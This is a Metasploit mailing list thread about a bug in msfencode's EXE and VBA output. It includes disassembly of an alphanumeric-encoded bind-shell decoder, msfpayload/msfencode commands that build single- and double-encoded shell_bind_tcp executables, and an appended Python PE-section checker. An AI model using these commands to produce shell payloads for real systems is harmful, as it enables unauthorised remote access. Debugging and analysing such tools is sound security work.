Metasploit mailing list archives

MSFEncode bug doesn't encode EXE's or VBA's


From: natron at invisibledenizen.org (natron)
Date: Fri, 19 Dec 2008 14:32:49 -0600

I can verify seeing a similar (same?) XOR error whenever I use the
AlphanumMixed or AlphanumUpper encoders.  I thought I was doing
something wrong...but perhaps it's a bug in the encoder.

I get the AV on:

XOR BYTE PTR DS:[ECX+33],AL

While ECX is FFFFFFFD... which causes an AV when it tries to write
that XOR to 0x00000030.

So reverting the template fixes that, eh?  That's fantastic, thanks
for letting the list know your workaround!

The windows/tcp_bind payload is encoding to this:

54               PUSH ESP ; shellcode begins here
5B               POP EBX
DAD0             FCMOVBE ST,ST
D973 F0          FSTENV (28-BYTE) PTR DS:[EBX-10]
5E               POP ESI
5E               POP ESI
56               PUSH ESI
59               POP ECX
49               DEC ECX
49               DEC ECX
49               DEC ECX
43               INC EBX
43               INC EBX
43               INC EBX
43               INC EBX
43               INC EBX
43               INC EBX
43               INC EBX
51               PUSH ECX
5A               POP EDX
56               PUSH ESI
54               PUSH ESP
58               POP EAX
3330             XOR ESI,DWORD PTR DS:[EAX]
56               PUSH ESI
58               POP EAX
34 41            XOR AL,41
50               PUSH EAX
3041 33          XOR BYTE PTR DS:[ECX+33],AL

N


On Fri, Dec 19, 2008 at 2:03 PM, Mark Baggett <huperdefigo at gmail.com> wrote:
It seems there is an error in msfencode.  Today it doesn't encode the
payload when an output type of EXE or VBA is selected.  Looking at the
code, the problem for payloads of type exe and vba is this:

First the variable raw is assigned the encoded payload returned by the
encode function...

Line 159
# Encode it up
raw = enc.encode(buf, badchars)

Then, when it creates its exe, it uses buf (the unencoded payload) again
rather than raw (the encoded payload).

Line 173
exe = Rex::Text.to_win32pe(buf, "")

I changed it to raw ...
exe = Rex::Text.to_win32pe(raw, "")

and it will then encode payloads of type exe.  But the encoded payloads do not
work.  Using OllyDbg I can see a memory access violation when the
actual xor encoding attempts to write to the code segment where the
payload runs.  I reverted to the template.exe distributed prior to
the Sept 29th update (Change set 5689) and everything works fine
now.

The same error is in the code for encoding vba output.

After those three changes I am able to make encoded payloads...

./msfpayload windows/shell_bind_tcp R | ./msfencode -t exe -o
~/winbindencoded.exe

and double encoded payloads...

./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/countdown
-t raw | ./msfencode -t exe -o ~/winbinddoubleencode.exe

Mark Baggett
http://markremark.blogspot.com
_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework
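A check a reader of this thread will want to run on a template.exe is whether the section that holds the entry point is mapped writable: a decoder stub that XORs its own bytes in place faults on the first write if its section is read+execute only. The script below is an added example (not part of the thread, and not msfencode or Rex code); it parses the PE section table with nothing but the standard library and assumes, as the messages above only imply, that the section Characteristics flags are what differ between the two template.exe versions. The `build_minimal_pe` helper constructs a synthetic header purely to exercise the parser; pass a real file path to inspect an actual binary.

```python
"""Check whether a PE's entry-point section is writable.

Added example for this thread (not msfencode/Rex code). A decoder stub that
XORs its own bytes in place needs the section it runs from to be mapped
writable; if the template's code section is read+execute only, the first
in-place write faults. Assumption: that permission difference is what
separates the two template.exe versions discussed above.
"""
import struct
import sys

# Section Characteristics flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe(data):
    """Return (entry_rva, sections) for a PE32 or PE32+ image held in `data`."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)
    (size_of_opt,) = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    # AddressOfEntryPoint sits at offset 16 in both PE32 and PE32+ optional headers.
    (entry_rva,) = struct.unpack_from("<I", data, opt + 16)
    table = opt + size_of_opt
    sections = []
    for i in range(num_sections):
        off = table + i * 40  # each IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr, raw_size, _raw_ptr = struct.unpack_from("<IIII", data, off + 8)
        (chars,) = struct.unpack_from("<I", data, off + 36)
        sections.append({
            "name": name,
            "vaddr": vaddr,
            "vsize": max(vsize, raw_size),  # loader maps at least the raw data size
            "code": bool(chars & IMAGE_SCN_CNT_CODE),
            "execute": bool(chars & IMAGE_SCN_MEM_EXECUTE),
            "read": bool(chars & IMAGE_SCN_MEM_READ),
            "write": bool(chars & IMAGE_SCN_MEM_WRITE),
        })
    return entry_rva, sections


def entry_section(data):
    """Return the section dict whose virtual range contains the entry point, or None."""
    entry_rva, sections = parse_pe(data)
    for s in sections:
        if s["vaddr"] <= entry_rva < s["vaddr"] + s["vsize"]:
            return s
    return None


def can_host_self_decoding_stub(data):
    """True only if the entry-point section is mapped both executable and writable."""
    s = entry_section(data)
    return bool(s and s["execute"] and s["write"])


def build_minimal_pe(text_characteristics):
    """Constructed PE32 header with one '.text' section at RVA 0x1000 that holds
    the entry point. It is not loadable; it exists only to exercise the parser."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)  # i386, 1 section, PE32 opt size
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                          # AddressOfEntryPoint
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200,
                          0, 0, 0, 0, text_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + section


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
    else:  # no file given: demonstrate on the constructed read+execute header
        data = build_minimal_pe(IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    for s in parse_pe(data)[1]:
        print(f"{s['name']:8s} rva=0x{s['vaddr']:x} R={s['read']} W={s['write']} X={s['execute']}")
    s = entry_section(data)
    print("entry section:", s["name"] if s else None,
          "| self-decoding stub can write in place:", can_host_self_decoding_stub(data))
```

Run against the two template.exe versions, a template whose code section reports W=False is one where an in-place XOR decoder will fault on its first write; the same check doubles as a cheap triage heuristic for analysts, since a shipped binary whose entry section is both writable and executable is worth a closer look.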